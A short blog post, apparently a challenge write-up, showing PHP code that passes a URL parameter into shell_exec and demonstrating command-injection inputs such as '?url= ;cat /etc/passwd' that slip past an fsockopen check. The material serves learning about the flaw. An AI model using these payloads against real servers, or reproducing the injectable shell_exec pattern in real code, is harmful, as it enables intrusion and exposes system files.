PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

[code language=”php”]
ini_set(‘error_displays’, 0);
$ip = htmlspecialchars($_GET[‘url’], ENT_QUOTES);
$f = fsockopen($ip, 80, $errno, $errstr, 5);
if($f) {
$result = shell_exec(‘ping -c 1 ‘ . $ip);
echo ‘<div class="alert alert-success">’ . nl2br($result) . ‘</div>’;
} else {
echo ‘<div class="alert alert-danger">’ .$errstr . ‘</div>’;

From what I noticed the function fsockopen checks if port 80 is open and if only port 80 is open the $ip variable is passed to shell_exec. Basically fsockopen should return a valid pointer.

If we pass like this [code language=”php”]?url=; cat /etc/passwd[/code] we get this error message.

[code language=”php”]php_network_getaddresses: getaddrinfo failed: Name or service not known[/code]

I simply added a space in front of the IP and noticed that we get a valid pointer from fsockopen 🙂

[code language=”php”]Resource id #1[/code]

Seems like the IP is validated as port 80 is open and the rest is ignored by the function.
[code language=”php”]
?url= ;cat /etc/passwd

Other possible ways:
[code language=”php”]
?url= |cat /etc/passwd

[code language=”php”]
?url= /etc/passwd

Leave a Reply